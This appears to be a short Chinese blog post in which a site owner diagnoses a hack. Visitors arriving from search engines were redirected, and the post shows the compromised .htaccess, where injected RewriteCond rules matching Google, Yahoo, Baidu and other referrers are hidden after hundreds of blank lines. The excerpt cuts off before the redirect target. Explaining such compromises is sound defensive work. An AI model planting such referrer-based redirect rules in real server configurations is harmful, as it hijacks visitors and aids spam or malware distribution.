大约 4 或 5 天前,一个客户回复我说他们的网站被从谷歌、雅虎等重定向到其他一些可疑的网站,但是当用户在浏览器地址中输入网站 URL 时它工作正常直接酒吧。
我尝试联系我的托管服务提供商,但他们一开始几乎没有帮助,然后似乎需要很长时间才能找出问题所在。
等待让我感到沮丧,我开始寻找发生了什么。在谷歌上搜索了一些解决方案后,我发现我的 .htaccess 文件被黑了。
什么是:
<Files *>
Header set Cache-Control: "private, pre-check=0, post-check=0, max-age=0"
Header set Expires: 0
Header set Pragma: no-cache
</Files>
已经变成
<Files *>
Header set Cache-Control: "private, pre-check=0, post-check=0, max-age=0"
Header set Expires: 0
Header set Pragma: no-cache
</Files>
//several hundred empty lines later
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
RewriteCond %{HTTP_REFERER} .*youtube.* [OR]
RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR] …